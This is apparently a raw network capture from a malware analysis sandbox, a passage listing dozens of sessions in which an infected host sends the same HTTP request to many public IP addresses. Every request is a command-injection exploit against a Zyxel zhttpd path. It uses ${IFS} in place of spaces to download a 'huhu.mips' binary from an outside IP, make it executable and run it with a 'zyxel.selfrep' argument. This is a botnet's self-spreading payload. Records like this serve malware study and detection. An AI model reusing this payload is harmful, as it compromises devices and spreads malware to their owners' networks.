                                                Jan 29, 2024 07:07:34.024305105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                907192.168.2.233769044.93.94.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.024343967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                908192.168.2.2358250137.90.21.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.024367094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                909192.168.2.2348718122.103.0.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.024386883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                910192.168.2.2343126134.143.221.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.024441004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                911192.168.2.2349222189.54.134.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.024463892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                912192.168.2.234053453.164.87.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.024516106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                913192.168.2.233389477.51.15.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.024569035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                914192.168.2.234777076.82.59.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.024614096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                915192.168.2.2357088192.174.184.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.024655104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                916192.168.2.2335984146.2.222.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.024678946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                917192.168.2.2355310199.78.166.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.024719954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                918192.168.2.234630290.251.115.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.024763107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                919192.168.2.233996218.181.8.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.024792910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                920192.168.2.235423840.86.224.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.024844885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                921192.168.2.23333345.67.210.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.024877071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                922192.168.2.234430853.112.10.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.024919033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                923192.168.2.233795223.214.231.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.024960041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                924192.168.2.233866684.159.48.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.024983883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                925192.168.2.2353876201.46.32.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.025029898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                926192.168.2.2360664114.126.93.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.025041103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                927192.168.2.234543080.170.110.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.025064945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                928192.168.2.2349332123.218.19.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.025124073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                929192.168.2.234594696.27.7.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.025141954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                930192.168.2.2339236171.187.2.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.025191069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                931192.168.2.2335066182.192.73.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.025239944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                932192.168.2.2349058136.153.85.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.025278091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                933192.168.2.235027454.189.147.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.025310040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                934192.168.2.2351204197.132.232.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.025351048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                935192.168.2.2335988103.152.240.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.025397062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                936192.168.2.235523838.200.20.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.025418043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                937192.168.2.2334880212.42.143.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.025469065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                938192.168.2.2356402111.109.17.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.025513887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                939192.168.2.2344832113.95.155.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.025528908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                940192.168.2.233637887.191.13.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.025562048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                941192.168.2.2351310219.5.129.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.025618076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                942192.168.2.2333850187.36.6.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.025644064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                943192.168.2.2353378101.40.145.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.025686026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                944192.168.2.2346218222.183.212.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.025727034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                945192.168.2.2346526131.250.223.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.025782108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                946192.168.2.235755696.108.31.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.025814056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                947192.168.2.2339418140.151.45.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.025847912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                948192.168.2.236050435.95.168.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.025893927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                949192.168.2.2337874118.102.154.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.025916100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                950192.168.2.2333140221.216.190.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.025959969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                951192.168.2.235476263.216.48.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.026000023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                952192.168.2.234584032.83.82.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.026031017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                953192.168.2.2360770200.15.124.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.026081085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                954192.168.2.2343038166.179.193.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.026110888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                955192.168.2.2341128142.175.212.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.026141882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                956192.168.2.2341470110.191.14.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.026197910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                957192.168.2.2334112200.97.166.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.026222944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                958192.168.2.2335256154.12.181.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.026272058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                959192.168.2.2353804126.226.50.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.026316881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                960192.168.2.2342924140.224.114.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.026335955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                961192.168.2.235724246.135.73.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.026380062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                962192.168.2.2357844133.69.192.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.026410103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                963192.168.2.2357396221.106.215.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.026462078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                964192.168.2.234036859.42.180.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.026483059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                965192.168.2.23523225.154.233.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.026519060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                966192.168.2.2355454101.78.146.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.026576042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                967192.168.2.235068481.156.97.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.026607990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                968192.168.2.2360860156.78.43.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.026639938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                969192.168.2.2342768126.180.74.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.026711941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                970192.168.2.2353936176.72.219.25443
                                                TimestampBytes transferredDirectionData
